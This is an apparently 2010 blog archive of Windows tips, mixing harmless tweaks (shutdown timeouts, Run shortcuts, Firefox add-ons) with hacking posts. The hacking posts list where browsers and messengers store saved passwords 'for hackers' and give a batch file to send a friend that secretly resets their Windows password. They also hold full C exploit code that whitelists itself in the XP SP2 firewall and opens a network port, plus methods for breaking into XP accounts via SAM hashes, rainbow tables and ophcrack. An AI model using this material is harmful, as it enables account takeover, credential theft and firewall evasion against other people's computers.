Thursday 18 November 2010

Want to Improve Shutdown Time


Want to Improve Shutdown Time !


Close apps automatically & quickly at shutdown

Open Registry by going to START-RUN and typing REGEDIT.



Navigate to 

HKEY_CURRENT_USER\CONTROL PANEL\DESKTOP

and look for AutoEndTasks.
On my computer default value is 0. Change it to 1.

Thats all.

Further more you can reduce the time it takes for Windows to issue kill directive to allactive/hung applications. In doing this only constraint that you should make sure exists is that HungAppTimeout is greater than WaitToKillAppTimeout. Change the values of WaitToKillAppTimeout to say 3500
(since default value for HungAppTimeout 5000 and for
WaitToKillAppTimeout is 20000)

How to hack password


Where The Saved Passwords Stores In Windows Xp & Vista - Must for hackers and Beginers


HOW TO ACCESS REGISTRY ??

1. Goto Start Menu.

2. Click on Run.

3. Type "regedit" (without quotes) in the Run Box .After that this Windows Opens . Now you are ready to see that.



LOCATIONS OF SAVED PASSWORDS !

# Internet Explorer 4.00 - 6.00: 

The passwords are stored in a secret location in the Registry known as the "Protected Storage".
The base key of the Protected Storage is located under the following key:
"HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider".
You can browse the above key in the Registry Editor (RegEdit), but you won't be able to watch the passwords, because they are encrypted.
Also, this key cannot easily moved from one computer to another, like you do with regular Registry keys.

# Internet Explorer 7.00 - 8.00: 

The new versions of Internet Explorer stores the passwords in 2 different locations.
1. AutoComplete passwords are stored in the Registry under
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2.

2. HTTP Authentication passwords are stored in the Credentials file under
Documents and Settings\Application Data\Microsoft\Credentials

, together with login passwords of LAN computers and other passwords.


# Firefox: 

The passwords are stored in one of the following filenames: signons.txt, signons2.txt, and signons3.txt (depends on Firefox version)
These password files are located inside the profile folder of Firefox, in
[Windows Profile]\Application Data\Mozilla\Firefox\Profiles\[Profile Name]

Also, key3.db, located in the same folder, is used for encryption/decription of the passwords.


# Google Chrome Web browser: 

The passwords are stored in
[Windows Profile]\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data

(This filename is SQLite database which contains encrypted passwords and other stuff)


# Opera: 

The passwords are stored in wand.dat filename, located under
[Windows Profile]\Application Data\Opera\Opera\profile


# Outlook Express (All Versions):

The POP3/SMTP/IMAP passwords Outlook Express are also stored in the Protected Storage, like the passwords of old versions of Internet Explorer.


# Outlook 98/2000: 

Old versions of Outlook stored the POP3/SMTP/IMAP passwords in the Protected Storage, like the passwords of old versions of Internet Explorer.


# Outlook 2002-2008: 

All new versions of Outlook store the passwords in the same Registry key of the account settings.
The accounts are stored in the Registry under
HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\[Profile Name]\9375CFF0413111d3B88A00104B2A6676\[Account Index]

If you use Outlook to connect an account on Exchange server, the password is stored in the Credentials file, together with login passwords of LAN computers.


# Windows Live Mail: 

All account settings, including the encrypted passwords, are stored in
[Windows Profile]\Local Settings\Application Data\Microsoft\Windows Live Mail\[Account Name]

The account filename is an xml file with .oeaccount extension.


# ThunderBird: 

The password file is located under
[Windows Profile]\Application Data\Thunderbird\Profiles\[Profile Name]

You should search a filename with .s extension.


# Google Talk:

All account settings, including the encrypted passwords, are stored in the Registry under
HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts\[Account Name]


# Google Desktop: 

Email passwords are stored in the Registry under
HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes\[Account Name]



# MSN/Windows Messenger version 6.x and below: 

The passwords are stored in one of the following locations:

1. Registry Key: HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger

2. Registry Key: HKEY_CURRENT_USER\Software\Microsoft\MessengerService

3. In the Credentials file, with entry named as "Passport.Net\\*". (Only when the OS is XP or more)


# MSN Messenger version 7.x: 

The passwords are stored under
HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Creds\[Account Name]


# Windows Live Messenger version 8.x/9.x: 

The passwords are stored in the Credentials file, with entry name begins with "WindowsLive:name=".



# Yahoo Messenger 6.x: 

The password is stored in the Registry, under
HKEY_CURRENT_USER\Software\Yahoo\Pager
("EOptions string" value)


# Yahoo Messenger 7.5 or later:


The password is stored in the Registry, under
HKEY_CURRENT_USER\Software\Yahoo\Pager - "ETS" value.

The value stored in "ETS" value cannot be recovered back to the original password.


# AIM Pro: 

The passwords are stored in the Registry, under
HKEY_CURRENT_USER\Software\AIM\AIMPRO\[Account Name]


# AIM 6.x:

The passwords are stored in the Registry, under
HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords



# ICQ Lite 4.x/5.x/2003: 

The passwords are stored in the Registry, under
HKEY_CURRENT_USER\Software\Mirabilis\ICQ\NewOwners\[ICQ Number]
(MainLocation value)


# ICQ 6.x: 

The password hash is stored in
[Windows Profile]\Application Data\ICQ\[User Name]\Owner.mdb (Access Database)
(The password hash cannot be recovered back to the original password)



# Digsby: 

The main password of Digsby is stored in
[Windows Profile]\Application Data\Digsby\digsby.dat

Windows key Shortcuts

Windows key Shortcuts

 ------------ Start menu




+D --------- Show Desktop

+Tab------- Moves through the task bar buttuns



+L--------- Shows the welcome screen/Lock the machine.

+M--------- Minimize all window

+E---------- Opens Explorer

+R---------- Opens 'RUN' Window

+U---------- Opens Utility Manager

+F---------- Opens Search window

 +Break------ Show system properties

+Shift+M---- Undo minimize all windows

F1--------- Display "help and support center"

+Ctrl+F----- Display search for computers.

Windows Run commands you probably never knew

Trick 1: Open your home directory

The home directory is located at C:\Documents and Settings\Username in Windows XP and C:\Users\Username in Windows Vista and 7. The quickest way to open this directory is to open the Run box (Win+R) and type “.” – a single dot. Then hit enter. Try it.

Windows Run commands you probably never knew


Trick 2: Open the users directory

The users directory is the directory one folder above the home directory, i.e. C:\Documents and Settings in Windows XP and C:\Users in Windows Vista and 7. To open this directory, type 2 dots in the Run box and hit enter.

Windows Run commands you probably never knew

Trick 3: Open My Computer

To quickly open My Computer, open the Run box and type 3 dots, like this.

Windows Run commands you probably never knew

Trick 4: Open system drive

The system drive is the one where Windows is installed, usually the C drive. To open this drive through the Run box type “\” – the backslash.

Windows Run commands you probably never knew

Windows Utilities Shortcuts

 Windows Utilities Shortcuts


Here are some popular shortcuts to handy Windows utilities:

Simply type the shortcut command in to the Run textbox (Start>> Run), then clickOK.


Shortcut Utility

compmgmt.msc Computer Management

devmgmt.msc Device Manager

dfrg.msc Disk Defragmenter

diskmgmt.msc Disk Management

eventvwr.msc Event Viewer

fsmgmt.msc Shared Folders Manager

gpedit.msc Group Policies Editor

lusrmgr.msc Local Users and Groups Manager

perfmon.msc Performance Monitor

secpol.msc Local Security Settings

services.msc Services

Windows XP SP3 Audio Problem


Windows XP SP3 Audio Problem


Let's get on with the solution... see if it works for you.

1) Open Regedit and go to :



HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Windows\CDSVersion

2) Double-click CDSVersion and change it to 200, then restart your system.
100 (hex) means its sp1

200 (hex) means its sp2

300 (hex) means its sp3

3) Install kb888111xp2.exe (Microsoft UAA Patch which should be available from your Audio driver folder)

4) Install audio driver

5) Change CSDVersion back to 300 (remember this or else you system will think it's still SP2 and many SP2 updates may reemerge in your Windows Update, that's my logical guess anyway )

6) Restart your system

Monday 27 September 2010

How to Shut Down short cut on your DeskTop


If you are in hurry and you don't have enough time to Shut Down your PC manually then what will you do? Will you turn off your PC directly? This is not the way. There is a very simple way! just create a Shut Down short cut on your DeskTop. love love 


1. Right click on empty space on your Desktop

2. Click “New”->”Shortcut

3. In “Type the location of the item” box type:

For shutdown: shutdown.exe -s -t 0

For restart: shutdown.exe -r -t 0

For logoff: shutdown.exe -l -t 0

For hibernation: rundll32.exe PowrProf.dll, SetSuspendState Hibernate

Parameter -t 0 will execute shutdown immediately. If you change -t 0 parameter to -t 60, shutdown will occur in 60 seconds and so on.



4. Click “Next”

5. Enter a name for the shortcut and click “Finish”

Now when ever you are in a hurry simply click on Shut Down shortcut to Shut Down your PC. Enjoy
love

7 Most Useful Firefox Add-Ons

7 Most Useful Firefox Add-Ons


These heavy-hitting browser add-ons act like applications that could easily replacetheir desktop counterparts.


1.) Animat 1.04



With Animat, you can create short animation clips saved in the APNG (animated portable network graphics) format. Although Animat installs as an add-on, it pops open and runs in its own Firefox browser window.

You can import images from several file formats (BMP, GIF, JPG, PNG) and sequence them in any order to create your animation. For what's supposed to be used for simpleanimation editing, Animat features a surprisingly deep toolset to crop, resize, rotate or reframe your source images. You can even reconfigure the work area (where the source and preview animation windows, and frame-by-frame timeline are positioned) to your liking.


https://addons.mozilla.org/en-US/firefox/addon/9820/


2.) FireFTP 1.0.8



This add-on app works so easily you might decide to forgo a standalone FTP file manager program. FireFTP is compatible with versions of Firefox for Windows, OS X and Linux (which is worth noting because the same add-on recognizes the file structures of these different operating systems).

FireFTP opens up like a normal tabbed page. Your local computer's file directory is shown in a pane on the left side, and the file structure of the remote server on the right. Simply click on whichever files you want to move, and select a direction arrow between the two panes to initiate a transfer (for example clicking the right-pointing arrow will upload files to the server).


https://addons.mozilla.org/en-US/firefox/addon/684/


3.) Online Music Player 1.5.8.7



It's debatable if Online Music Player counts as a "pure" add-on for Firefox, since it requires Flash to be installed on the browser. But it's hard to ignore that this is a very capable MP3 player matching the basic features and functionality of a standalone application: it has an easy-to-use interface, but also includes playlist management, and lyrics search.

Online Music Player resides along Firefox's status bar, where its player controls, and the title of the song playing are displayed. It can play your MP3 files stored locally on your computer, as well as, conveniently, MP3s you find on the Web (by you right-clicking on the link to the file and selecting "Play It").


https://addons.mozilla.org/en-US/firefox/addon/4617/


4.) Diagram Drawing Application : Pencil 1.0.6



Pencil was designed for users to create business diagrams, and for developers to quickly throw together GUI mock-ups. (It comes with a selection of graphics illustrating common user interface widgets.) But its toolset allows for more artistic purposes, as you can make clip art with it. You can export your completed artwork as PNG, PDF or HTML files, or even as Microsoft (MSFT) Word or OpenOffice.org documents.

Like Animat, Pencil opens a new window and runs within it, and, thus, can work as its own application when you close the first open instance of Firefox.


https://addons.mozilla.org/en-US/firefox/addon/8487/


5.) Email client: Simple Mail 2.74



Most people use Webmail nowadays for their e-mailing needs. But if you require accessing your e-mail through a POP3 or IMAP server (or you would like to save your e-mails to your local computer) and you'd rather not fuss with a standalone program, this add-on transforms Firefox into a full-fledged e-mail client.

Simple Mail opens as a tabbed page within Firefox. It features the ability to handle multiple POP3 and IMAP accounts, e-mail composing with an editor that lets you use various fonts and colors, an address book, and inbox message filtering and other customizable functions. Like FireFTP, Simple Mail works well enough that you might choose to regularly use it in lieu of a standalone counterpart.


https://addons.mozilla.org/en-US/firefox/addon/5593/


6.) Vector Graphics Editor : SVG-edit 2.4



Like Animat and Pencil, SVG-edit pops open its own window and can, thus, function like a typical desktop program. This add-on app features standard drawing tools: freehand, point-to-point line, and rectangle and circle/ellipse drawing. You can incorporate text into your design. As it's meant for creating vectorized images, SVG-edit's primary editing tools allow you to manipulate (such as move, resize) and extract the layered components of your art.

You can only save your work as an SVG file. (Currently, you cannot export it into other image formats.) Yet SVG-edit provides the essential tools you'll need for creating vector graphics, and it runs quite nimbly.


https://addons.mozilla.org/en-US/firefox/addon/14186/


7.) Instant Messenger : Yoono - Twitter, Facebook, LinkedIn, MySpace, Flickr, AIM, MSN, GTalk... 7.1.6



There are other add-ons providing instant-messaging capability to Firefox, but Yoono gets the special mention here because it supports the most chat and social-networking services: AIM, Facebook, Flickr, FriendFeed, Google (GOOG) Talk, Imeem, LinkedIn, MSN, MySpace, Twitter, and Yahoo (YHOO) Messenger.

Yoono also throws in widgets for Web note-taking (such as you can clip and save text orimages you find on the Web); an RSS reader; e-mail alerting for your Yahoo Mail, Gmail and Hotmail accounts; and it can stream music from Imeem or Last.fm.

Yoono installs as a sidebar set to the left of the main Firefox window. When you click a button, it slides open as a wider control panel, but, otherwise, takes up minimal space.

Sunday 26 September 2010

Changing password of a remote PC

Changing password of a remote PC


Using the below given tips you can change the password of an user account in your friend’s system.

1. Open notepad.

2. Type the following command.

@echo off

net user username password

echo “type message here” pause

3. Save as filename.bat and select type of files as all files otherwise, file didn’t work.

4. Send file to your friend through any messenger.

Change your processor name and frequency


Trick: Change your processor name and frequency !
Trick: Change your processor name and frequency !
 You can change your processor name, using a litlle registry trick.
Changing the name processor is just for fun ,and will not improove your sistem speed!


Ok to start all u have to do is copy the text from below:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0]
"ProcessorNameString"="Intel Core i7 Extreme 965 Overclocked bY CrYs18 to 14.99 GHz"

Paste it to notepad ,modify the name of the processor as u like, go to Save as onnotepad, name the file whatever u like like (Example: "trick.reg" ) remember to put extension ".reg", Save as type select "All files" , OK
No double click the file u created (egg. "trick.reg"), click Yes, then OK. Now u are done, go to Properties on My Computer and u will see the result!
Works on Xp, Vista, 7 ..

Change owner and organization in System Properties

Change owner and organization in System Properties
If you want to change the owner and organization in System Properties, just do thefollowing.

Open the registry and go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion

Now just change the value for RegisteredOwner and RegisteredOrganization.

Calculations On Command Prompt

Calculations On Command Prompt


the command processor CMD.EXE comes with a mini-calculator that can perform simple arithmetic on 32-bit signed integers:

C:\>set /a 2+2
4
C:\>set /a 2*(9/2)
8
C:\>set /a (2*9)/2
9
C:\>set /a "31>>2"
7

Note that we had to quote the shift operator since it would otherwise be misinterpreted as a "redirect stdout and append" operator.

For more information, type set /? at the command prompt.

Bypassing Windows-XP Firewall

Bypassing Windows-XP Firewall

There is a technique using which we can bypass windows-xp service pack-2 firewall.
This techniques is nothing but the vulnerability found in windows-xp sp2 firewall.
This is explained here in detail with exploit code.

Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall's registry keys allow local attackers tobypass the Firewall blocking list and allow malicious program to connect the network.


Credit :-
The information has been provided by Mark Kica.
The original article can be found at: http://taekwondo-itf.szm.sk/bugg.zip
Vulnerable Systems :-
* Microsoft Windows XP SP2
Windows XP SP2 Firewall has list of allowed program in registry which are not properly protected from modification by a malicious local attacker.
If an attacker adds a new key to the registry address of HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List, the attacker can enable his malware or Trojan to connect to the Internet without theFirewall triggering a warning.
Proof of Concept :-
Launch the regedit.exe program and access the keys found under the following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List
Add an entry key such as this one:
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat

Exploit :-
#include
#include
#include
#include
#include "Shlwapi.h"
int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];
HKEY hKey;
int i;
GetModuleFileName(NULL, filename, 1024);
strcpy(buffer, filename);
strcat(buffer, ":*:Enabled:");
strcat(buffer, "bugg");
RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",
0,
KEY_ALL_ACCESS,
&hKey);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

int temp, sockfd, new_fd, fd_size;
struct sockaddr_in remote_addr;
fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
fprintf(stdout, " This is not trojan \n");
fprintf(stdout, " Opened port is :2001 \n");
fprintf(stdout, "author:Mark Kica student of Technical University Kosice\n");
fprintf(stdout, "Dedicated to Katka H. from Levoca \n");
sleep(3);
if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;
for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);
if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror("accept");
continue;
}
temp = send(new_fd, "Hello World\r\n", strlen("Hello World\r\n"), 0);
fprintf(stdout, "Sended: Hello World\r\n");
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = '\0';
fprintf(stdout, "Recieved: %s\r\n", buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
if (!strcmp(buffer, "quit"))
break;
}
ezsocket_exit();
return 0;
}
/* EoF */

Breaking In Windows XP Password

Breaking In Windows XP Password
Method 1:

If you have an administrator account (Not Guest)

then the XP users’ passwords can be reset using command prompt.

Go to the task-bar and click on the Start button, then click on run and in the place given on dialog box type “command”, press enter.

Now In the Command prompt type “net user”
the screen will display the list of users available on machine

suppose there are three administrator users with the name of admin1, admin2 and admin3

then the password of any user can be changed by logging into the account of any oneadministrator

for example if we want to change the password of admin1

then we can change it from the following command

net user admin1 password

similarly for other desired users

The general syntax is for changing password is

net user 

Limitations: The above method will only work if you are logged in as the administratoruser.

Method 2:

Windows Recovery option,

Boot from the Windows XP CD and press enter when you are prompted to InstallWindows copy, on the next screen there is a repair existing Windows version. Thismethod is also known as windows recovery method,

The repair option will take as much time as the installation would have taken because the Windows file-system is replaced including the SAM file where the password is stored.

C:WindowsSystem32configsam

whereas the users’ setting remain untouched.

Thus the users’ password is reset to NULL value.

#In repair mode you have another hole to modify the password.It is easier.The steps are as following.

Boot from xp bootable.After license agreement is done(pressing f8) select the target window for repair.

After file copy completed machine will restart.And repair process will start.You will see ‘installing devices’ 39 minutes left etc. at bottom left of your screen.

Now press Shift+f10.A console(command window) will open.

type nusrmgr.cpl and hit enter.This will let you to enter in the user account setting.Nowchange the password.You will not be asked for old password. Just type the new password there.

Continue the repair process.It is strongly recommended that you continue the repair until it is completed.

You are done, the password is replaced.The password strength does not matter in this case.

Method 3:

Boot your computer from a live Linux CD or DVD which has an NTFS/HPFS file-system support.

Then Mount the drive which has Windows copy installed on it. Copy the sam file on the location

C:WindowsSystem32configsam

Which will be mentioned as /media/disk-1/Windows/System32/config/sam

It is a common misconception that sam file can be viewed through normal text editor, sam file isnt a normal text file.

Gnome, KDE or vim text Editors won’t display the content of this file

Open the file using Emacs Editor (available in nearly all the distributions of Live Linux). It will be hard to find the the password hashes, so go for the user-names which are not encrypted, just after the user-names passwords’ hashes can be found out, copy the code between “%” sign and on the the Google search for the rainbow tables, They will provide the decrypted value which have already been brute-forced earlier. This is isn’t a sure shot method, as the rainbow project is still under development. The password can be set to NULL by deleting the content, but this might result in the corruption of the sam file, and recovery is the only option left after it.

Limitations: This Method can corrupt your SAM file, which may lead to a repair ofWindows XP, and you can risk your personal data with that.

Method 4:

OPHcrack method.

This is a sure shot password recovery method based upon bruteforcing.

This Live CD is based upon the slax LiveCD v.5.1.7. It has been customized to include ophcrack 2.3.3 and the SSTIC04-10k tables set. It is able to crack 99.9%% of alphanumeric passwords. Since the tables have to be loaded into memory, cracking time varies with the amount of available RAM. The minimum amount of RAM required is 256MB (because the LiveCD uses a lot of it). The recommended amount is 512MB. Ophcrack will auto-detect the amout of free memory and adapts its behaviour to be able to preload all the tables it can.

A shell script launched at the beginning of the X session(Session for managing your desktop) does the job of finding the Windows partition and starting appropriate programs to extract and crack password hashes. It will look for all partitions that contains hashes. If more than one are found, you will have to choose between them.

If your partition is not detected, make sure your the partition containing the hashes you want to crack is mounted and the use ophcrack ‘Load from encrypted SAM’ function to recover your Windows hashes. Then click ‘Launch’ and the cracking process will start.